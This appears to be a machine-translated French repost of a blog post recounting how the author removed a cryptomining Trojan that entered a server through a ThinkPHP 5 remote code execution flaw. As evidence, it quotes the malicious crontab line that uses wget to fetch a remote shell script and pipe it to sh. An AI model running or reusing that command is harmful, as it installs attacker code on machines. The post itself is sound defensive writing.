Maison >cadre php >PensezPHP >Expérience de suppression d'un cheval de Troie : gestion d'un cheval de Troie qui exploitait la vulnérabilité d'exécution de code à distance de thinkphp5

Expérience de suppression d'un cheval de Troie : gestion d'un cheval de Troie qui exploitait la vulnérabilité d'exécution de code à distance de thinkphp5

藏色散人
藏色散人avant
2021-04-06 14:13:402782parcourir

La colonne tutorielle suivante de thinkphp vous présentera comment gérer un cheval de Troie qui exploite la vulnérabilité d'exécution de code à distance de thinkphp5. J'espère qu'il sera utile à vos amis dans le besoin !

Expérience de suppression d'un cheval de Troie : gestion d'un cheval de Troie qui exploitait la vulnérabilité d'exécution de code à distance de thinkphp5

Souvenez-vous d'une expérience de suppression d'un cheval de Troie : gérer un cheval de Troie qui exploitait la vulnérabilité d'exécution de code à distance de thinkphp5

Hier, j'ai découvert qu'un serveur était soudainement lent Le haut montre que plus de 100% de l'utilisation du processeur de plusieurs processus est

La commande d'exécution est :

/tmp/php  -s /tmp/p2.conf

Il est fondamentalement certain qu'elle a été bloquée

L'étape suivante consiste à déterminer la source

le dernier n'a aucun enregistrement de connexion

Tuez d'abord ces processus, mais ils réapparaissent quelques minutes plus tard

Voyons ce que veut ce cheval de Troie à faire en premier

netstat a vu Ce cheval de Troie a ouvert un port et établi une connexion avec une IP étrangère

Cependant, tcpdump n'a trouvé aucun transfert de données pendant un moment

Qu'est-ce que il veut faire ?

Continuez à vérifier les journaux

J'ai trouvé dans le journal cron que l'utilisateur www a une opération de synchronisation crontab, ce qui est fondamentalement le problème

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1

J'ai téléchargé quelques problèmes et j'ai vu Il semble qu'il s'agisse d'un cheval de Troie minier

L'utilisateur www sur le serveur a été créé en installant lnmp. En regardant la source, il s'agit probablement d'une vulnérabilité Web.

Regardez encore, les autorisations de php sous /tmp sont www.

Vérifiez les logs de plusieurs sites sous lnmp et constatez que la vulnérabilité d'exécution de code à distance récemment exposée dans thinkphp 5 est utilisée

Détails de la vulnérabilité : https://nosec.org/home/detail/2050.html

Réparer le problème et le résoudre

Mais ce site est un site de test et le port l'écoute est 8083. Y a-t-il des pirates informatiques maintenant ? Pouvez-vous commencer à détecter les ports non conventionnels ?

Source : https://www.simapple.com/425.html

Recommandations associées : Les 10 derniers didacticiels vidéo thinkphp

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Déclaration:
Cet article est reproduit dans:. en cas de violation, veuillez contacter admin@php.cn Supprimer